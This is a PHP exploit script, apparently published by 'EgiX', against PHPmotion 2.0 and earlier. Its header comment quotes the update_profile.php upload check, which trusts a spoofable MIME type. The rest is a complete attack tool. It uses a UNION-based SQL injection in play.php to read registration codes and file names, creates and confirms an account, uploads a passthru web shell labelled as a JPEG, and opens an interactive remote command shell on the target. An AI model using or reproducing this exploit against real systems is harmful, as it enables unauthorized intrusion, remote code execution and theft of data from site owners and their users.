phpmotion-upload.txt

`<?php  
  
/*  
-----------------------------------------------------------------  
PHPmotion <= 2.0 (update_profile.php) Remote Shell Upload Exploit  
-----------------------------------------------------------------  
  
author...: EgiX  
mail.....: n0b0d13s[at]gmail[dot]com  
  
link.....: http://www.phpmotion.com/  
details..: don't works on windows platforms due to $_FILES['ufile']['tmp_name'] is stripslashed  
  
[-] vulnerable code in /update_profile.php  
  
255. // START OF FILE UPLOAD AND SECURITY CHECK  
256. $limit_size = $config['maximum_size'];//you can change this to a higher file size limit (this is in bytes = 2MB apprx)  
257. $random = randomcode();//create random number  
258. $uniquename1 = $random . $_FILES['ufile']['name'];//add random number to file name to create unique file  
259. $uniquename = mysql_real_escape_string($uniquename1);  
260. $path = installation_paths();  
261. $path = $path . "/pictures/" . $uniquename;  
262.   
263. if ($_FILES) {  
264. // Store upload file size in $file_size  
265. $file_size = $_FILES['ufile']['size'];  
266. //die("\$file_size = $file_size; \$limit_size = $limit_size;");  
267.   
268. if ($file_size >= $limit_size) {  
269. // Display file size error  
270. // ///////////////////////  
271. $show = 1;  
272. $message_type = $config["notification_success"];//the messsage displayed at the top coner  
273. $error_message = 'Your image is too large. The maximum size allowed is: ' . $config['maximum_size_human_readale'];  
274. $blk_id = 1;//html table - error block  
275. $template = "templates/main_1.htm";  
276. $inner_template1 = "templates/inner_myaccount_update_profile.htm";//middle of page  
277. $TBS = new clsTinyButStrong;  
278. $TBS->NoErr = true;// no more error message displayed.  
279. $TBS->LoadTemplate("$template");  
280. $TBS->Render = TBS_OUTPUT;  
281. $TBS->Show();  
282.   
283. @mysql_close();  
284. die();  
285. }  
286. else {  
287. $filetype = $_FILES['ufile']['type']; <=======  
288. if ($filetype == "image/gif" || $filetype == "image/jpeg" || $filetype ==  
289. "image/pjpeg") {  
290. // copy file to where you want to store file  
291. if (@copy($_FILES['ufile']['tmp_name'], $path)) {  
292. }  
293. else {  
294. // Display general file copy error  
  
an attacker might be able to upload arbitrary malicious files with .php extension due to the code  
near lines 287-289 will check only the MIME type of the upload request, that can be easily spoofed!  
*/  
  
error_reporting(0);  
set_time_limit(0);  
ini_set("default_socket_timeout", 5);  
  
function http_send($host, $packet)  
{  
$sock = fsockopen($host, 80);  
while (!$sock)  
{  
print "\n[-] No response from {$host}:80 Trying again...";  
$sock = fsockopen($host, 80);  
}  
fputs($sock, $packet);  
while (!feof($sock)) $resp .= fread($sock, 1024);  
fclose($sock);  
return $resp;  
}  
  
// yes, SQL injection vulnerable too!  
function retrive_data($field, $table, $clause)  
{  
global $host, $path;  
  
$sql = "-1/**/UNION/**/SELECT/**/".str_repeat("1,",16)."{$field},".encodeSQL("yes").",1,1,1/**/FROM/**/{$table}/**/WHERE/**/{$clause}%23";  
  
$packet = "GET {$path}play.php?vid={$sql} HTTP/1.0\r\n";  
$packet .= "Host: {$host}\r\n";  
$packet .= "Connection: close\r\n\r\n";  
  
preg_match("/play.php\?vid=(.*)\"/", http_send($host, $packet), $match);  
return $match[1];  
}  
  
function encodeSQL($sql)  
{  
for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i]));  
return "CONCAT(0x{$encoded})";  
}  
  
function upload()  
{  
global $host, $path, $sid, $username;  
  
login();  
  
print "[-] Trying to upload a shell...\n";  
  
$payload = "--o0oOo0o\r\n";  
$payload .= "Content-Disposition: form-data; name=\"submitted_pic\"\r\n\r\nyes\r\n";  
$payload .= "--o0oOo0o\r\n";  
$payload .= "Content-Disposition: form-data; name=\"ufile\"; filename=\".php\"\r\n";  
$payload .= "Content-Type: image/jpeg\r\n\r\n";  
$payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";  
$payload .= "--o0oOo0o--\r\n";  
  
$packet = "POST {$path}update_profile.php HTTP/1.0\r\n";  
$packet .= "Host: {$host}\r\n";  
$packet .= "Cookie: PHPSESSID={$sid}\r\n";  
$packet .= "Content-Length: ".strlen($payload)."\r\n";  
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";  
$packet .= "Connection: close\r\n\r\n";  
$packet .= $payload;  
  
http_send($host, $packet);  
  
$user_id = (int) retrive_data("user_id", "member_profile", "user_name=".encodeSQL($username));  
$file_name = retrive_data("file_name", "pictures", "user_id={$user_id}");  
  
if (!isset($file_name)) die("\n[-] Upload failed...\n");  
else return $file_name;  
}  
  
function login()  
{  
global $host, $path, $username, $password, $sid;  
  
print "\n[-] Logging in with username '{$username}' and password '{$password}'\n";  
  
$data = "user_name_login={$username}&password_login={$password}&submitted=yes";  
$packet = "POST {$path}login.php HTTP/1.0\r\n";  
$packet.= "Host: {$host}\r\n";  
$packet.= "Content-Length: ".strlen($data)."\r\n";  
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.= "Connection: close\r\n\r\n";  
$packet.= $data;  
$html = http_send($host, $packet);  
  
preg_match("/PHPSESSID=([0-9a-f]{32})/i", $html, $match);  
$sid = $match[1];  
  
if (!preg_match("/Location: myaccount.php/i", $html))  
{  
print "[-] Login failed!\n";  
register();  
login();  
}  
}  
  
function register()  
{  
global $host, $path, $username, $password;  
  
print "\n[-] Registering new user '{$username}' with password '{$password}'\n";  
  
// register a new account  
$data = "user_name={$username}";  
$data .= "&password={$password}";  
$data .= "&confirm_password={$password}";  
$data .= "&email_address=".md5(time())."@null.com";  
$data .= "&form_submitted=yes";  
$data .= "&terms=yes";  
$packet = "POST {$path}register.php HTTP/1.0\r\n";  
$packet.= "Host: {$host}\r\n";  
$packet.= "Content-Length: ".strlen($data)."\r\n";  
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.= "Connection: close\r\n\r\n";  
$packet.= $data;  
  
http_send($host, $packet);  
  
$code = retrive_data("random_code", "member_profile", "user_name=".encodeSQL($username));  
if (!isset($code)) die("\n[-] Registration failed...\n");  
  
// and confirm the registration  
$packet = "GET {$path}confirm.php?id={$code} HTTP/1.0\r\n";  
$packet.= "Host: {$host}\r\n";  
$packet.= "Connection: close\r\n\r\n";  
  
if (!preg_match("/registration is now complete/i", http_send($host, $packet))) die("\n[-] Registration failed...\n");  
}  
  
print "\n+---------------------------------------------------------------------------+";  
print "\n| PHPmotion <= 2.0 (update_profile.php) Remote Shell Upload Exploit by EgiX |";  
print "\n+---------------------------------------------------------------------------+\n";  
  
if ($argc < 3)  
{  
print "\nUsage......: php $argv[0] host path\n";  
print "\nExample....: php $argv[0] localhost /";  
print "\nExample....: php $argv[0] localhost /phpmotion/\n";  
die();  
}  
  
$host = $argv[1];  
$path = $argv[2];  
  
$username = "pr00f_0f";  
$password = "_c0nc3pt";  
  
$r_path = "pictures/".upload();  
  
define(STDIN, fopen("php://stdin", "r"));  
  
while(1)  
{  
print "\nphpmotion-shell# ";  
$cmd = trim(fgets(STDIN));  
if ($cmd != "exit")  
{  
$packet = "GET {$path}{$r_path} HTTP/1.0\r\n";  
$packet.= "Host: {$host}\r\n";  
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";  
$packet.= "Connection: close\r\n\r\n";  
$output = http_send($host, $packet);  
if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");  
$shell = explode("_code_", $output);  
print "\n{$shell[1]}";  
}  
else break;  
}  
  
?>  
  
`